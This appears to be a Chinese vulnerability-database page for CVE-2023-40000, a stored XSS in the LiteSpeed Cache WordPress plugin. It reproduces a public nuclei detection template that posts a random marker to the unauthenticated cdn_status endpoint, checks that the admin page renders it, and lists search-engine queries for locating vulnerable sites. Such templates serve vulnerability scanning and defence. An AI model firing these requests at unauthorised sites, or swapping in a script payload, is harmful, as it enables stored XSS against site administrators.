CVE-2023-40000: LiteSpeed Cache <= 5.7 - Unauthenticated Stored XSS

日期: 2025-08-01 | 影响软件: LiteSpeed Cache | POC: 已公开

漏洞描述

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS.This issue affects LiteSpeed Cache- from n/a through 5.7.

PoC代码[已公开]

id: CVE-2023-40000

info:
  name: LiteSpeed Cache <= 5.7 - Unauthenticated Stored XSS
  author: 0x_Akoko
  severity: high
  description: |
    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS.This issue affects LiteSpeed Cache- from n/a through 5.7.
  reference:
    - https://wpscan.com/vulnerability/dd9054cc-1259-427d-a4ad-1875b7b2b3b4
    - https://wordpress.org/plugins/litespeed-cache
    - https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-5-7-unauthenticated-site-wide-stored-xss-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id: CVE-2023-40000
    cwe-id: CWE-79
    epss-score: 0.82698
    epss-percentile: 0.99196
    cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: litespeedtech
    product: litespeed_cache
    framework: wordpress
    shodan-query: 'vuln:CVE-2023-40000'
    fofa-query: "wp-content/plugins/litespeed-cache/"
    google-query: inurl:"/wp-content/plugins/litespeed-cache/"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,litespeed-cache,xss,intrusive

variables:
  marker: "{{randstr}}"

flow: http(1) || (http(2) && http(3) && http(4))

http:
  - raw:
      - |
        GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'LiteSpeed Cache')
          - compare_versions(version, '<= 5.7.0.1')
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'

  - raw:
      - |
        POST /wp-json/litespeed/v1/cdn_status HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        success=0&result[_msg]={{marker}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body,'_res','ok')
          - contains(content_type,"application/json")
          - status_code == 200
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=litespeed-cdn HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "{{marker}}", "LiteSpeed Cache")
        condition: and
# digest: 4a0a00473045022100d49871db784d1ba3219937be3ed14e5a40392d68c3df290fdc281f1a3d068fa902204e4167b1dc38a8c457dc363315f2cfae2884bae5481b2ed075bd3e4b019a5fdf:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-40000.yaml

相关漏洞推荐